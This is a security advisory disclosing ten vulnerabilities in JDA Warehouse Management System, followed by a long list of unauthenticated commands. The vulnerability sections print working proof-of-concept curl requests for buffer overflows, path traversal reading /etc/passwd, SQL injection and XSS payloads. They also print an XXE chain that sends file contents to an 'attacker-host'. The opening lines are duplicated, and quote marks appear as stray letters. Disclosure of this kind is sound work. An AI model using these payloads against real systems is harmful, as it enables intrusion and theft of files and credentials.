Introduction
=========
Multiple critical vulnerabilities were identified in JDA Warehouse
management system (WMS).
The vulnerabilities were disc Introduction
=========
Multiple critical vulnerabilities were identified in JDA Warehouse
management system (WMS).
The vulnerabilities were discovered during a
black box security assessment and therefore the vulnerability list
should not be considered exhaustive.
Affected Software and Versions
========================
- Tested with JDA WMS (most recent version at the date of July 2017)
- All vulnerabilities are fixed as of patch 2017.2 (released at the end
of 2017)
CVE
===
No CVEs have been assigned yet.
Author
=====
The vulnerabilities were discovered by Xiaoran Wang from Google Security
Team.
Credit
=====
The author would like to thank John Vrankovich from JDA for coordinating
the security fixes promptly and diligently.
Vulnerability Overview
=================
WMS-01 Remote unauthenticated buffer overflow in ./seamles/lib/libSeamLES.so
WMS-02 Remote unauthenticated buffer overflow in ./moca/lib/MOCAbase.so
WMS-03 Remote unauthenticated command execution in wmstst
WMS-04 Remote unauthenticated path traversal and arbitrary file download in
moca request adownload client componenta
WMS-05 Remote unauthenticated SQL injection in wmstst/dcs/lib/DCSint.so
WMS-06 Remote unauthenticated XXE in WMS backend HTTP service
WMS-07 No XSS protection in the WMS portal
WMS-08 Improper CSRF protection
WMS-09 Unauthenticated RMI Registry and servers from webtst
WMS-10 Privilege escalation through acompress filea command in moca request
Vulnerability Details
===============
----------------------------------------------------------------------------
WMS-01 Remote unauthenticated buffer overflow in ./seamles/lib/libSeamLES.so
----------------------------------------------------------------------------
Severity: CRITICAL
In 0x10c7e6, a strcpy is used to copy the user supplied user_id into a
buffer of 100 bytes.A user_id thatas longer than 100 bytes will trigger the
daemon crash, possibly leading to code execution. This can be triggered by
sending the asl_log error msg_loga command to a vulnerable WMS wmstst
server. An example request is like the following. (replace server and port
with the vulnerable one)
curl -X POST --data "<moca-request
autocommit='true'><environment></environment><context><field
name='i_user_id' type='STRING' oper='EQ'>$(python -c 'print
"A"*1000')</field></context><query>sl_log error
msg_log</query></moca-request>" --header "content-type:
application/moca-xml" http://server:port/service
This can be verified by stracing the parent wmstst process and look for new
child process being spawned.
sudo strace -ff -s 1500 -p wmstst_parent_pid -e execve
-----------------------------------------------------------------------
WMS-02 Remote unauthenticated buffer overflow in ./moca/lib/MOCAbase.so
-----------------------------------------------------------------------
Severity: CRITICAL
In 0x358D, an array is used to store segments of the format string and itas
allocated to hold 300 string segment pointers. However, if an attacker pass
a format string that has more than 300 formatters, it will overflow the
stack, possibly causing code execution. This can be triggered by sending
the asprintf dataa command to a vulnerable WMS wmstst server. An example
request is like the following. (replace server and port with the vulnerable
one)
curl -X POST --data "<moca-request
autocommit='true'><environment></environment><context><field name='format'
type='STRING' oper='EQ'>$(python -c 'print "%n"*10000')</field><field
name='args' type='STRING'
oper='EQ'>aaa,bbb,ccc</field></context><query>sprintf
data</query></moca-request>" --header "content-type: application/moca-xml"
http://server:port/service
This can be verified by stracing the parent wmstst process and look for new
child process being spawned
sudo strace -ff -s 1500 -p wmstst_parent_pid -e execve,fork,clone
---------------------------------------------------------
WMS-03 Remote unauthenticated command execution in wmstst
---------------------------------------------------------
Severity: CRITICAL
In wmstst, moca-request are sent to the backend server to retrieve data or
perform tasks. There are 9413 commands (files ends with .mcmd), out of
which 226 are not authenticated. There are at least a dozen commands within
this group should be guarded with authentication. For example, (adump dataa
accepts a adump_commanda parameter that allows arbitrary MOCA command
execution (all SQL operations, reading files, etc.), adownload filea
downloads any file from the server, aget trace filea also downloads any
file from the server, aget encryption informationa returns the encryption
key used, alist web session keysa outputs all sessions on the server,
acompress filea overwrite existing files, etc.)
The list of unauthenticated commands are in Appendix I.
--------------------------------------------------------------------------------------------------------------------
WMS-04 Remote unauthenticated path traversal and arbitrary file download in
moca request adownload client componenta
--------------------------------------------------------------------------------------------------------------------
Severity: CRITICAL
The adownload client componenta looks for files to download within two
dozen directories in
a/export/jda/wmstst/(mcs|sal|moca|mtf|dcs|les|seamles)/downloads/(forms|components|res|help|xsl)/a.
However, it does not prevent the user from putting a../../a into the file
name, bypassing the restriction. For example, sending the following request
to the vulnerable command handler downloads /etc/passwd from the host. This
is high risk as the endpoint is also not authenticated.
curl -X POST --data '<moca-request
autocommit="true"><environment></environment><context><field
name="filename" type="STRING"
oper="EQ">../../../../../../../../etc/passwd</field></context><query>download
client component</query></moca-request>' --header "content-type:
application/moca-xml" http://host:port/service (replace host and port with
the vulnerable service)
-----------------------------------------------------------------------
WMS-05 Remote unauthenticated SQL injection in wmstst/dcs/lib/DCSint.so
-----------------------------------------------------------------------
Severity: CRITICAL
In intGetNextLabel, a SQL statement like the following is constructed where
the %s is replaced by used supplied string without sanitization. "select
'X' from prsmst where prtadr = '%s' and rerprt is not null ". This can be
triggered by sending a aget next labela query to the vulnerable wmstst moca
service handler
curl -X POST --data "<moca-request
autocommit='true'><environment></environment><context><field name='prtadr'
type='STRING' oper='EQ'>' or 'x'='y'--'</field></context><query>get next
label</query></moca-request>" --header "content-type: application/moca-xml"
http://server:port/service
Response indicates a SQL error. Database Error: 511 - ORA-00907: missing
right parenthesis
-------------------------------------------------------------
WMS-06 Remote unauthenticated XXE in WMS backend HTTP service
-------------------------------------------------------------
Severity: HIGH
The backend service listening on port 4650 is vulnerable to XXE and allows
an attacker to steal any files that the user awmststa is able to access. To
reproduce,
1. Create a file thatas accessible to wmstst, such as /tmp/secretfile with
mode 744. Put some content into the file, such as atopsecret_includeda.
This is the target file we want to steal. (echo atopsecret_includeda >
/tmp/secretfile&& chmod 744 /tmp/secret)
2. On the attacker server, start a simple HTTP server with the following
file to be served. Replace your attacker-host and attacker-port.
ee.xml, <!ENTITY % data SYSTEM "file:///tmp/secretfile"><!ENTITY % param1
"<!ENTITY % exfil SYSTEM 'http://attacker-host:attacker-port
/?%data;'>">
3. Send the following curl request to the vulnerable backend HTTP service.
(replace attacker-host and attacker-port with your own, same as victim-host
and victim-port)
curl -X POST --data '<?xml version="1.0" ?> <!DOCTYPE r [ <!ELEMENT r ANY >
<!ENTITY % sp SYSTEM "http://attacker-host:attacker-port/ee.xml"> %sp;
%param1; %exfil; ]><moca-request
autocommit="true"><environment></environment><query>get encryption
information</query></moca-request>' --header "content-type:
application/moca-xml" http://victim-host:victim-port/service
4. Observe the HTTP server log to see the content of the secret being
sniffed out
------------------------------------------
WMS-07 No XSS protection in the WMS portal
------------------------------------------
Severity: MEDIUM
Inputting any field with scripts such as a<img src=x onerror=alert(2)>a
will trigger the script to execute. This happens in editing field names,
searching keywords, etc. An attacker can inject a malicious script to run
in the victimas context and steal data.
Thereas a referrer check that enforces the data is coming only from the
same domain. However checking for referrer is not sufficient as there are
always ways to bypass it. For example, the referrer checks in this case
does not enforce HTTPS on the referrer, allowing a network attacker to
spoof a HTTP site with the same domain.
-------------------------------
WMS-08 Improper CSRF protection
-------------------------------
Severity: MEDIUM
There is a CSRF token in every request to the main WMS portal, however the
CSRF token is in the cookie. This defeat the purpose of CSRF protection as
browsers send them automatically along with other cookies. For example,
sending the following requests (with the right headers and cookie values)
result in change of data at the backend.
POST /data/WM/wm/addresses?siteId=DC0001&_dc=1497973569329 HTTP/1.1
Host: wms-host
Cookie: REFSSessionID=jkhj; JDA-CSRF=3738e726-aec2-4222-bbff-47a6116e371c
{"addressId":"","hostExternalId":"","addressName":"<IMG SRC=X
ONERROR=ALERT(101)>","addressLine1":"<IMG SRC=X
ONERROR=ALERT(104)>","addressLine2":"<IMG SRC=X
ONERROR=ALERT(105)>","addressLine3":"","city":"Ylo","state":"<IMG SRC=X
ONERROR=ALERT(107)>","postalCode":"12345","addressType":"SUP","clientId":"E1000","countryName":"","phoneNumber":"","timeZone":"","firstName":"asdsad","lastName":"asdasdsad","localeId":"","customsSiteType":"","globalLocationNumber":"","customsTaxSite":"","temporary":false,"residentialAddress":false,"receivingWebAddress":"","contactName":"","contactPhone":"","attentionPhone":"","faxNumber":"","email":"","contactTitle":"","attentionName":"","shippingPhone":"","shippingWebAddress":"","shippingContactName":"","shippingContactPhone":"","shippingAttentionPhone":"","shippingFax":"","shippingEmail":"","shippingContactTitle":"","shippingAttentionName":"","honorific":"","addressDistrict":"","poBoxFlag":false,"poolPointFlag":false,"poolRatingServiceName":"","region":"","latitude":"","longitude":""}
-----------------------------------------------------------
WMS-09 Unauthenticated RMI Registry and servers from webtst
-----------------------------------------------------------
Severity: MEDIUM
Webtst uses ehcache, which listens for cache syncs from peers. It opens
port 40001 as its RMI registry exposing objects such as tokenCache,
sessionCache, exportCache, etc. that stores authentication tokens, session
information, and exported data from WMS. All of them can be accessed
without authentication. The RMI server lives on port 40340 however for some
reason the server is not running or started correctly. Hence, the severity
of the issue is only moderate.
Through unauthenticated RMI registry port 40001, itas also discovered that
RMI objects ahotfixes, nodeInfo and cacheEventBusa are available on port
46978. Connecting to 46978 required no authentication and an attacker can
use aobject.getElements(object.getKeys())a to get all of the attributes in
those objects, as well as potentially invoking other functions.
---------------------------------------------------------------------------
WMS-10 Privilege escalation through acompress filea command in moca request
---------------------------------------------------------------------------
Severity: MEDIUM
The acompress filea command in ./mcs/src/cmdsrc/mcsbase/compress_file.mcmd
compress a file given its path specified in the request and put the
compressed file in the same directory with an extension also specified in
the request. Unfortunately the compressed file is always world readable
even if the previous file is not. An attacker can leverage this to read
files that they do not have access to. For example,
1. create a file named /tmp/secretfile and give it 640 permission.
2. Send the following request to compress the file. (replace the server
and port to be the vulnerable moca server)
curl -X POST --data '<moca-request
autocommit="true"><environment></environment><context><field
name="filename" type="STRING" oper="EQ">/tmp/secretfile</field><field
name="extension" type="STRING"
oper="EQ">gz</field></context><query>compress file</query></moca-request>'
--header "content-type: application/moca-xml" http://server:port/service
3. A new compressed file is created in /tmp/secretfile.gz which will be
world readable.
-------------------------------------------------
Appendix I: List of unauthenticated moca requests
-------------------------------------------------
./seamles/src/cmdsrc/SeamLES/translate_control_characters_to_string.mcmd
translate control characters to string
./seamles/src/cmdsrc/SeamLES/sl_get_now.mcmd
sl_get now
./seamles/src/cmdsrc/SeamLES/sl_handle_xml_file_using_stax.mcmd
sl_handle xml_file_using_stax
./seamles/src/cmdsrc/SeamLES/sl_db_constraint.mcmd
sl_db constraint
./seamles/src/cmdsrc/SeamLES/sl_free_java_cache.mcmd
sl_free java_cache
./seamles/src/cmdsrc/SeamLES/sl_list_ftp_files.mcmd
sl_list ftp_files
./seamles/src/cmdsrc/SeamLES/sl_handle_xml_file_using_dom.mcmd
sl_handle xml_file_using_dom
./seamles/src/cmdsrc/SeamLES/sl_get_ifd_data_as_xml_str.mcmd
sl_get ifd_data_as_xml_str
./seamles/src/cmdsrc/SeamLES/sl_send_ifd_data_xml_get.mcmd
sl_send ifd_data_xml_get
./seamles/src/cmdsrc/SeamLES/sl_handle_xml_string_using_dom.mcmd
sl_handle xml_string_using_dom
./seamles/src/cmdsrc/SeamLES/sl_send_ifd_data_xml_init.mcmd
sl_send ifd_data_xml_init
./seamles/src/cmdsrc/SeamLES/sl_get_transformed_xml_string.mcmd
sl_get transformed_xml_string
./seamles/src/cmdsrc/SeamLES/sl_send_file_to_sftp.mcmd
sl_send file_to_sftp
./seamles/src/cmdsrc/SeamLES/sl_list_sl_version.mcmd
sl_list sl_version
./seamles/src/cmdsrc/SeamLES/sl_validate_xml_file.mcmd
sl_validate xml_file
./seamles/src/cmdsrc/SeamLES/translate_string_to_control_characters.mcmd
translate string to control characters
./seamles/src/cmdsrc/SeamLES/sl_send_file_to_ftp.mcmd
sl_send file_to_ftp
./seamles/src/cmdsrc/SeamLES/sl_db_import_constraints.mcmd
sl_db import_constraints
./seamles/src/cmdsrc/SeamLES/sl_list_sftp_files.mcmd
sl_list sftp_files
./seamles/src/cmdsrc/SeamLES/sl_get_transformed_xml_file.mcmd
sl_get transformed_xml_file
./seamles/src/cmdsrc/SeamLES/sl_log_error_msg_log.mcmd
sl_log error msg_log
./seamles/src/cmdsrc/SeamLES/sl_get_ifd_data_for_head_event.mcmd
sl_get ifd_data_for_head_event
./seamles/src/cmdsrc/SeamLES/sl_pkchange_description.mcmd
sl_pkchange description
./seamles/src/cmdsrc/SeamLES/sl_send_ifd_data_xml_add.mcmd
sl_send ifd_data_xml_add
./seamles/src/cmdsrc/SeamLES/sl_get_trigger_file_name.mcmd
sl_get trigger_file_name
./seamles/src/cmdsrc/SeamLES/sl_handle_xml_string_using_stax.mcmd
sl_handle xml_string_using_stax
./seamles/src/cmdsrc/SeamLES/sl_convert_xml_data_by_unescaping.mcmd
sl_convert xml_data_by_unescaping
./seamles/src/cmdsrc/SeamLES/sl_db_create_constraint.mcmd
sl_db create_constraint
./seamles/src/cmdsrc/SeamLES/sl_check_perf_post_proc_ifd_for_xml.mcmd
sl_check perf_post_proc_ifd_for_xml
./seamles/src/cmdsrc/SeamLES/generate_pk_colval.mcmd
generate pk colval
./seamles/src/cmdsrc/SeamLES/sl_send_ifd_data_xml_finish.mcmd
sl_send ifd_data_xml_finish
./seamles/src/cmdsrc/sljsock/sl_jsock_send_msg_vcstd_hardware.mcmd
sl_jsock send_msg vcstd hardware
./seamles/src/cmdsrc/sljsock/sl_jsock_reply_msg_dm.mcmd
sl_jsock reply_msg dm
./seamles/src/cmdsrc/sljsock/sl_jsock_reply_msg_vcstd_hardware.mcmd
sl_jsock reply_msg vcstd hardware
./seamles/src/cmdsrc/sljsock/sl_jsock_reply_msg_vcodr.mcmd
sl_jsock reply_msg vcodr
./seamles/src/cmdsrc/sljsock/sl_jsock_proc_inb_thread_vox.mcmd
sl_jsock proc_inb_thread vox
./seamles/src/cmdsrc/sljsock/sl_jsock_reply_msg_wcs.mcmd
sl_jsock reply_msg wcs
./seamles/src/cmdsrc/sljsock/sl_jsock_proc_inb_thread_wcs.mcmd
sl_jsock proc_inb_thread wcs
./seamles/src/cmdsrc/sljsock/sl_jsock_proc_inb_thread_std.mcmd
sl_jsock proc_inb_thread std
./seamles/src/cmdsrc/sljsock/sl_jsock_send_msg_dm.mcmd
sl_jsock send_msg dm
./seamles/src/cmdsrc/sljsock/sl_jsock_reply_msg_vcstd.mcmd
sl_jsock reply_msg vcstd
./seamles/src/cmdsrc/sljsock/sl_jsock_send_msg_wcs.mcmd
sl_jsock send_msg wcs
./seamles/src/cmdsrc/sljsock/sl_jsock_proc_inb_thread_vc.mcmd
sl_jsock proc_inb_thread vc
./seamles/src/cmdsrc/sljsock/sl_jsock_send_msg_vcodr.mcmd
sl_jsock send_msg vcodr
./seamles/src/cmdsrc/sljsock/sl_jsock_reply_msg_std.mcmd
sl_jsock reply_msg std
./seamles/src/cmdsrc/sljsock/sl_jsock_send_msg_std.mcmd
sl_jsock send_msg std
./seamles/src/cmdsrc/sljsock/sl_jsock_proc_inb_thread_vcstd.mcmd
sl_jsock proc_inb_thread vcstd
./seamles/src/cmdsrc/sljsock/sl_jsock_reply_msg_vc.mcmd
sl_jsock reply_msg vc
./seamles/src/cmdsrc/sljsock/sl_jsock_reply_msg_vcstd_test_alg.mcmd
sl_jsock reply_msg vcstd test alg
./seamles/src/cmdsrc/sljsock/sl_jsock_proc_inb_thread_vcodr.mcmd
sl_jsock proc_inb_thread vcodr
./seamles/src/cmdsrc/sljsock/sl_jsock_send_msg_vc.mcmd
sl_jsock send_msg vc
./seamles/src/cmdsrc/sljsock/sl_jsock_reply_msg_vox.mcmd
sl_jsock reply_msg vox
./seamles/src/cmdsrc/sljsock/sl_jsock_proc_inb_thread_dm.mcmd
sl_jsock proc_inb_thread dm
./seamles/src/cmdsrc/sljsock/sl_jsock_send_msg_vox.mcmd
sl_jsock send_msg vox
./seamles/samples/transactions/inbound/edi_940/src/cmdsrc/samplejava/identify_sample_segment_edi_940.mcmd
identify sample_segment_edi_940
./mcs/src/cmdsrc/mcsbase/compress_file.mcmd
compress file
./mcs/src/cmdsrc/mcsbase/list_toolbar_config.mcmd
list toolbar config
./mcs/src/cmdsrc/mcsbase/list_grid_definitions.mcmd
list grid definitions
./mcs/src/cmdsrc/mcsbase/get_addon_id_keys.mcmd
get addon_id keys
./mcs/src/cmdsrc/mcsbase/list_work_flow_form_link.mcmd
list work flow form link
./mcs/src/cmdsrc/mcsbase/get_dynamic_rf_configurations.mcmd
get dynamic rf configurations
./mcs/src/cmdsrc/mcsbase/get_buttonbar.mcmd
get buttonbar
./mcs/src/cmdsrc/mcsbase/get_client_hooks.mcmd
get client hooks
./mcs/src/cmdsrc/mcsbase/get_grid_config.mcmd
get grid config
./mcs/src/cmdsrc/mcsbase/get_rdt_variable_lookup.mcmd
get rdt variable lookup
./mcs/src/cmdsrc/mcsbase/get_policy_information.mcmd
get policy information
./mcs/src/cmdsrc/mcsbase/get_form_file.mcmd
get form file
./mcs/src/cmdsrc/mcsbase/convert_user_password_decrypt.mcmd
convert user password decrypt
./mcs/src/cmdsrc/mcsbase/get_policy_fields.mcmd
get policy fields
./mcs/src/cmdsrc/mcsbase/list_grid_view_details.mcmd
list grid view details
./mcs/src/cmdsrc/mcsbase/get_les_lookups.mcmd
get les lookups
./mcs/src/cmdsrc/mcsbase/list_grid_views.mcmd
list grid views
./mcs/src/cmdsrc/mcsbase/download_client_component.mcmd
download client component
./mcs/src/cmdsrc/mcsbase/get_work_flow.mcmd
get work flow
./mcs/src/cmdsrc/mcsbase/get_les_custom_field.mcmd
get les custom field
./mcs/src/cmdsrc/mcsbase/get_command_columns.mcmd
get command columns
./mcs/src/cmdsrc/mcsbase/get_system_comment.mcmd
get system comment
./mcs/src/cmdsrc/mcsbase/get_work_flow_data.mcmd
get work flow data
./mcs/src/cmdsrc/mcsbase/list_buttonbar_config.mcmd
list buttonbar config
./mcs/src/cmdsrc/mcsbase/get_les_actions.mcmd
get les actions
./mcs/src/cmdsrc/mcsbase/get_buttons.mcmd
get buttons
./mcs/src/cmdsrc/mcsbase/get_buttonbar_config.mcmd
get buttonbar config
./mcs/src/cmdsrc/mcsbase/convert_user_password_encrypt.mcmd
convert user password encrypt
./mcs/src/cmdsrc/mcsbase/get_form_data.mcmd
get form data
./mcs/src/cmdsrc/mcsbase/get_les_command.mcmd
get les command
./mcs/src/cmdsrc/mcsbase/get_les_lookup.mcmd
get les lookup
./mcs/src/cmdsrc/mcsbase/get_dynamic_configurations.mcmd
get dynamic configurations
./mcs/src/cmdsrc/mcsbase/get_les_variable_lookup.mcmd
get les variable lookup
./mcs/src/cmdsrc/mcsbase/get_password_expiration_information.mcmd
get password expiration information
./mcs/src/cmdsrc/mcsbase/get_grid_display_rules.mcmd
get grid display rules
./mcs/src/cmdsrc/mcsbase/get_policy_field_values.mcmd
get policy field values
./mcs/src/cmdsrc/mcsbase/get_system_update_info.mcmd
get system update info
./mcs/src/cmdsrc/mcsbase/check_single_signon.mcmd
check single signon
./mcs/src/cmdsrc/mcsbase/list_work_flow_apps.mcmd
list work flow apps
./mcs/src/cmdsrc/mcsbase/download_file.mcmd
download file
./mcs/src/cmdsrc/mcsbase/get_les_variable_input.mcmd
get les variable input
./mcs/src/cmdsrc/mcsbase/list_comp_versions.mcmd
list comp versions
./mcs/src/cmdsrc/mcsbase/get_toolbar_config.mcmd
get toolbar config
./mcs/src/cmdsrc/mcsbase/get_policy_areas.mcmd
get policy areas
./mcs/src/cmdsrc/mcsbase/get_les_variable_configuration.mcmd
get les variable configuration
./mcs/src/cmdsrc/mcsbase/get_addon_id.mcmd
get addon_id
./mcs/src/cmdsrc/mcsbase/list_work_flow.mcmd
list work flow
./mcs/src/cmdsrc/mcsbase/get_system_update_timestamp.mcmd
get system update timestamp
./mcs/src/cmdsrc/mcsbase/get_les_variable_validation.mcmd
get les variable validation
./mcs/src/cmdsrc/mcsbase/list_grid_menu_items.mcmd
list grid menu items
./mcs/src/cmdsrc/mcsbase/get_les_variable_valid_possibility.mcmd
get les variable valid possibility
./mcs/src/cmdsrc/mcsbase/get_les_variable_default.mcmd
get les variable default
./mcs/src/cmdsrc/mcsbase/get_trace_file_size.mcmd
get trace file size
./mcs/src/cmdsrc/mcsbase/acknowledge_message_for_device.mcmd
acknowledge message for device
./mcs/src/cmdsrc/mcsbase/get_toolbar.mcmd
get toolbar
./mcs/src/cmdsrc/mcsbase/get_les_lookup_field.mcmd
get les lookup field
./mcs/src/cmdsrc/mcsbase/get_les_variable.mcmd
get les variable
./mcs/src/cmdsrc/mcsbase/check_for_messages.mcmd
check for messages
./mcs/src/cmdsrc/mcsbase/get_top_level_buttons.mcmd
get top level buttons
./mcs/src/cmdsrc/mcsbase/get_host_name.mcmd
get host name
./mcs/src/cmdsrc/mcsbase/list_work_flow_forms.mcmd
list work flow forms
./mcs/src/cmdsrc/mcsbase/get_rdt_var_config.mcmd
get rdt var config
./mcs/src/cmdsrc/mcsbase/list_grid_views_by_user.mcmd
list grid views by user
./mcs/src/cmdsrc/mcsbase/get_cache_time_stamp.mcmd
get cache time stamp
./mcs/src/cmdsrc/mcsbase/get_login_fields.mcmd
get login fields
./mcs/src/cmdsrc/mcssecurity/change_option.mcmd
change option
./mcs/src/cmdsrc/mcssecurity/login_user.mcmd
login user
./mcs/src/cmdsrc/mcssecurity/validate_user_password.mcmd
validate user password
./mcs/src/cmdsrc/mcssecurity/remove_option.mcmd
remove option
./mcs/src/cmdsrc/mcssecurity/validate_federale_authentication_request.mcmd
validate federale authentication request
./mcs/src/cmdsrc/mcssecurity/handle_login_failure.mcmd
handle login failure
./mcs/src/cmdsrc/mcssecurity/get_login_fields_data.mcmd
get login fields data
./mcs/src/cmdsrc/mcsi18n/get_rdt_mls_catalog.mcmd
get rdt mls catalog
./mcs/src/cmdsrc/mcsi18n/get_les_mls_catalog.mcmd
get les mls catalog
./mcs/src/cmdsrc/mcsi18n/get_system_description.mcmd
get system description
./mcs/src/cmdsrc/mcsi18n/get_time_zone_information.mcmd
get time zone information
./mcs/src/cmdsrc/mcsi18n/get_mls_text.mcmd
get mls text
./mcs/src/cmdsrc/mcsi18n/get_mls_catalog.mcmd
get mls catalog
./moca/src/cmdsrc/mocabase/get_encryption_information.mcmd
get encryption information
./moca/src/cmdsrc/mocabase/decrypt_file_using_RPBF.mcmd
decrypt file using RPBF
./moca/src/cmdsrc/mocabase/get_trace_file.mcmd
get trace file
./moca/src/cmdsrc/mocabase/reorder_columns.mcmd
reorder columns
./moca/src/cmdsrc/mocabase/dump_data.mcmd
dump data
./moca/src/cmdsrc/mocabase/sprintf_data.mcmd
sprintf data
./moca/src/cmdsrc/mocabase/set_process_priority.mcmd
set process priority
./moca/src/cmdsrc/mocabase/format_data.mcmd
format data
./moca/src/cmdsrc/mocabase/check_command_syntax.mcmd
check command syntax
./moca/src/cmdsrc/mocabase/get_db.mcmd
get db
./moca/src/cmdsrc/mocabase/list_library_versions.mcmd
list library versions
./moca/src/cmdsrc/mocabase/get_current_trace_levels.mcmd
get current trace levels
./moca/src/cmdsrc/mocabase/set_trace.mcmd
set trace
./moca/src/cmdsrc/mocabase/encrypt_file_using_RPBF.mcmd
encrypt file using RPBF
./moca/src/cmdsrc/mocabase/list_library_version.mcmd
list library version
./moca/src/cmdsrc/mocabase/format_control_file.mcmd
format control file
./moca/src/cmdsrc/mocasecurity/login_webservice.mcmd
login webservice
./moca/src/cmdsrc/mocasecurity/login_user.mcmd
login user
./moca/src/cmdsrc/mocasecurity/validate_federated_authentication_request.mcmd
validate federated authentication request
./moca/src/cmdsrc/mocasecurity/validate_federale_authentication_request.mcmd
validate federale authentication request
./moca/src/cmdsrc/mocaems/log_ems_event.mcmd
log ems event
./moca/src/cmdsrc/mocaems/submit_ems_primed_event.mcmd
submit ems primed event
./moca/src/cmdsrc/mocaems/submit_ems_raised_events.mcmd
submit ems raised events
./moca/samples/server/java/sample_create_results.mcmd
sample create results
./moca/samples/server/java/sample_get_map.mcmd
sample get map
./moca/samples/server/java/sample_split_mapping.mcmd
sample split mapping
./moca/samples/server/java/sample_do_something.mcmd
sample do something
./moca/samples/server/java/sample_add_map.mcmd
sample add map
./moca/samples/server/java/sample_create_map.mcmd
sample create map
./moca/samples/server/java/sample_list_foo.mcmd
sample add map
./moca/samples/server/java/sample_split_string.mcmd
sample split string
./moca/samples/server/java/sample_get_dst.mcmd
sample get dst
./moca/samples/server/java/sample_hello_world.mcmd
sample hello world
./sal/src/cmdsrc/salweb/remove_web_session.mcmd
remove web session
./sal/src/cmdsrc/salweb/list_web_session_keys.mcmd
list web session keys
./sal/src/cmdsrc/salweb/list_web_sessions.mcmd
list web sessions
./sal/src/cmdsrc/salweb/get_web_device_types.mcmd
get web device types
./sal/src/cmdsrc/salweb/list_web_session_ages.mcmd
list web session ages
./sal/src/cmdsrc/salweb/list_active_users.mcmd
list active users
./sal/src/cmdsrc/salbase/check_3pl_single_client_diasable.mcmd
check 3pl single client disable
./sal/src/cmdsrc/salbase/create_velocity_type.mcmd
create velocity type
./sal/src/cmdsrc/salbase/change_velocity_type.mcmd
change velocity type
./dcs/src/cmdsrc/dcsint/list_rf_policies.mcmd
list rf policies
./dcs/src/cmdsrc/dcsint/get_next_label.mcmd
get next label
./dcs/src/cmdsrc/dcsint/load_rf_policies.mcmd
load rf policies
./dcs/src/cmdsrc/dcsint/get_label_file.mcmd
get label file
./dcs/src/cmdsrc/dcsint/get_next_bom_line.mcmd
get next bom line
./dcs/src/cmdsrc/dcsint/get_addon_id.mcmd
get addon_id
./dcs/src/cmdsrc/dcsint/get_next_note_line.mcmd
get next note line
./dcs/src/cmdsrc/dcsint/get_next_invoice_line.mcmd
get next invoice line
./dcs/src/cmdsrc/dcsint/get_login_fields.mcmd
get login fields
./dcs/src/cmdsrc/dcslm/create_assignment_from_result_set.mcmd
create assignment from result set
./dcs/src/cmdsrc/dcsrf/check_single_scan_loading_for_fluid_load.mcmd
check single scan loading for fluid load
./dcs/src/cmdsrc/dcsrf/acknowledge_message_for_device.mcmd
acknowledge message for device
./dcs/src/cmdsrc/dcsrpweb/list_rf_vendors_for_web.mcmd
list rf vendors for web
./dcs/src/cmdsrc/dcsdyncfg/configure_set_maxqvl_flag.mcmd
configure setmaxqvl flag
./dcs/src/cmdsrc/dcsdyncfg/configure_export_type_for_order_line.mcmd
configure export type for order line
./dcs/src/cmdsrc/dcsdyncfg/configure_dynamic_slotting_fields.mcmd
configure dynamic slotting fields
./dcs/src/cmdsrc/dcsdyncfg/configure_inventory_service_type_new_mode.mcmd
configure inventory service type new mode
./dcs/src/cmdsrc/dcsdyncfg/configure_mincatch_qty.mcmd
configure mincatch quantity
./dcs/src/cmdsrc/dcsdyncfg/configure_rft_rackquiz.mcmd
configure rft rackquiz
./dcs/src/cmdsrc/dcsdyncfg/configure_supplier_consigned_fields_for_receiving.mcmd
configure supplier consigned fields for receiving
./dcs/src/cmdsrc/dcsdyncfg/configure_form_close_trlr_fields.mcmd
configure form close_trlr fields
./dcs/src/cmdsrc/dcsdyncfg/configure_trlr_num_criteria_mode.mcmd
configure trlr_num criteria mode
./dcs/src/cmdsrc/dcsdyncfg/configure_cnfrm_asset_tag_field_enable.mcmd
configure cnfrm_asset_tag field enable
./dcs/src/cmdsrc/dcsdyncfg/configure_inventory_service_type_criteria_mode.mcmd
configure inventory service type criteria mode
./dcs/src/cmdsrc/dcsdyncfg/configure_supplier_consigned_fields.mcmd
configure supplier consigned fields
./dcs/src/cmdsrc/dcsdyncfg/configure_cnfrm_trailer_asset_tag_field.mcmd
configure cnfrm trailer asset tag field
./dcs/src/cmdsrc/dcsdyncfg/configure_check_in_trailer_asset_fields_enable.mcmd
configure check in trailer asset fields enable
./dcs/src/cmdsrc/dcsdyncfg/configure_invalid_cat_button.mcmd
configure invalid cat button
./dcs/src/cmdsrc/dcsdyncfg/configure_fields_for_pickup.mcmd
configure fields for pickup
./dcs/src/cmdsrc/dcsdyncfg/configure_allocatecatch_quantity.mcmd
configure allocatecatch quantity
./dcs/src/cmdsrc/dcsdyncfg/configure_fields_for_asset_typ.mcmd
configure fields for asset typ
./dcs/src/cmdsrc/dcsdyncfg/configure_clientid_fields_visibility.mcmd
configure clientid fields visibility
./dcs/src/cmdsrc/dcsdyncfg/configure_clsrcvtrkopr_fields_visibility.mcmd
configure clsrcvtrkopr fields visibility
./dcs/src/cmdsrc/dcsdyncfg/configure_distromnt_fields.mcmd
configure distromnt fields
./dcs/src/cmdsrc/dcsdyncfg/configure_part_clientid_fields_visibility.mcmd
configure part clientid fields visibility
./dcs/src/cmdsrc/dcsdyncfg/configure_default_inventory_status_field.mcmd
configure default inventory status field
./dcs/src/cmdsrc/dcsdyncfg/configure_export_type_for_shipment.mcmd
configure export type for shipment
./dcs/src/cmdsrc/dcsdyncfg/configure_starter_pallet_fields.mcmd
configure starter pallet fields
./dcs/src/cmdsrc/dcsdyncfg/configure_receive_invoice_line_fields.mcmd
configure receive invoice line fields
./dcs/src/cmdsrc/dcsdyncfg/configure_trlrmgtopr_fields_enable.mcmd
configure trlrmgtopr fields enable
./dcs/src/cmdsrc/dcsdyncfg/configure_dispatchtrlr_fields_enable.mcmd
configure dispatchtrlr fields enable
./dcs/src/cmdsrc/dcsdyncfg/configure_supplier_consigned_fields_for_invadj.mcmd
configure supplier consigned fields for invadj
./dcs/src/cmdsrc/dcsdyncfg/configure_trailer_asset_fields_enable.mcmd
configure trailer asset fields enable
./dcs/src/cmdsrc/dcsdyncfg/configure_minimum_shelf_life_field.mcmd
configure minimum shelf life field
./dcs/src/cmdsrc/dcsdyncfg/configure_supplier_consigned_fields_at_warehouse.mcmd
configure supplier consigned fields at warehouse
./dcs/src/cmdsrc/dcsdyncfg/configure_bomcatch_quantity.mcmd
configure bomcatch quantity
./dcs/src/cmdsrc/dcsdyncfg/configure_trailer_asset_fields_visibility.mcmd
configure trailer asset fields visibility
./mtf/src/cmdsrc/mtfint/list_rf_runnable_forms.mcmd
list rf runnable forms
./mtf/src/cmdsrc/mtfint/list_rf_vendors.mcmd
list rf vendors
